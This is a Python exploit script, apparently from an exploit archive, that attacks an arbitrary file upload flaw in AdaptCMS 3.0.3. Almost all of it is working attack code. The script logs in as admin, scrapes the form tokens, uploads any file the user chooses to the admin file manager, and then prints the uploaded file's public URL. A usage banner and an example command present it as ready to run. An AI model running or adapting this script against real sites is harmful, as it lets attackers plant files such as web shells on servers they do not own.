#!usr/bin/python """ | Exploit Title: Adapt Cms Arbitrary File Upload | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.adaptcms.com/ | | Download Link : http://www.adaptcms.com/downloads/latest_adaptcms.zip | | Tested Version : AdaptCMS 3.0.3 | | Tested on: Windows 7 / Mozilla Firefox | | Date: 2017-01-22 """ import requests,os,sys from bs4 import BeautifulSoup error="" def banner_print(error): banner=""" _______________________________________________________________________________________ _ _ _____ _ _ _ _ /\ | | (_) | __ \(_) (_) | | | / \ ___| |__ _ _ _ __ _ _ __ ___ | | | |_ __ _ _| |_ __ _| | / /\ \ / __| '_ \| | | | |/ _` | '_ \ / _ \ | | | | |/ _` | | __/ _` | | / ____ \\__ \ | | | | |_| | (_| | | | | __/ | |__| | | (_| | | || (_| | | /_/ \_\___/_| |_|_|\__, |\__,_|_| |_|\___| |_____/|_|\__, |_|\__\__,_|_| __/ | __/ | |___/ |___/ _____ _ _ _______ / ____| (_) | |__ __| | (___ ___ ___ _ _ _ __ _| |_ _ _ | | ___ __ _ _ __ ___ \___ \ / _ \/ __| | | | '__| | __| | | | | |/ _ \/ _` | '_ ` _ \ ____) | __/ (__| |_| | | | | |_| |_| | | | __/ (_| | | | | | | |_____/ \___|\___|\__,_|_| |_|\__|\__, | |_|\___|\__,_|_| |_| |_| __/ | |___/ \ / _._|_ _ _| |_ /\ _ _ . _ _ |_ _|_ \/\/ | | | (/_(_| |_)\/ /~~\| | ||| .(_|| | | / _| | ____________________________________________________________________________________ \t%s \t Usage : python exploit.py site username_of_admin password_of_admin \t example : python exploit.py http://example.com admin 12345 """%(error) print banner banner_print(error) http=requests.session() class adapt_exploit: def __init__(self,url,user,passwd,file): self.url=url self.user=user self.passwd=passwd self.file=file def login(self): req=http.get(url+'/login') soup=BeautifulSoup(req.content,"html.parser") token1=soup.find_all('input',{'type':'hidden','name':'data[_Token][key]'})[0].get('value') token2=soup.find_all('input',{'type':'hidden','name':'data[_Token][fields]'})[1].get('value') print '\n[+] The token for login was received successfully.\n' data={'_method':'POST', 'data[_Token][key]':token1, 'data[User][username]':self.user, 'data[User][password]':self.passwd, 'data[_Token][fields]':token2} req=http.post(url+'/login',data=data) if 'success' in req.content.lower(): print '[+] Login success\n' else: print '[!] Login Failed\n' exit() def upload(self): req=http.get(url+'/admin/files/add') soup=BeautifulSoup(req.content,"html.parser") token1=soup.find('input',{'type':'hidden','name':'data[_Token][key]'}).get('value') token2=soup.find('input',{'type':'hidden','name':'data[_Token][fields]'}).get('value') print '[+] The token for login was received successfully.\n' path=raw_input('Please enter path file that you want upload ...\n') path=path.replace('"','') path=path.replace('\'','') f=open(path,'rb') file= {'data[File][filename]' : f} data={'_method':'POST', 'data[_Token][key]':token1, 'data[_Token][fields]':token2, 'data[File][type]':'upload', 'data[File][0][random_filename]':'0' } req=http.post(url+'/admin/files/add',data=data,files=file) check=http.get('%s/uploads/'%(url)) file_name=os.path.basename(f.name).replace(' ','_') if file_name in check.content: print "[+] File upload was successful\n" print "URL Of File : %s/upload/%s"%(url,file_name) else: print "\n[-] Failed to upload file " try : url=sys.argv[1] user=sys.argv[2] passwd=sys.argv[3] expl=adapt_exploit(url,user,passwd,file) expl.login() expl.upload() except IndexError as e: if 'nt' in os.name : os.system('cls') else: os.system('clear') error="Invalid Usage !" banner_print(error) except Exception as e: print "oops !!!\n Some Thing is Wrong :(( " print str(e)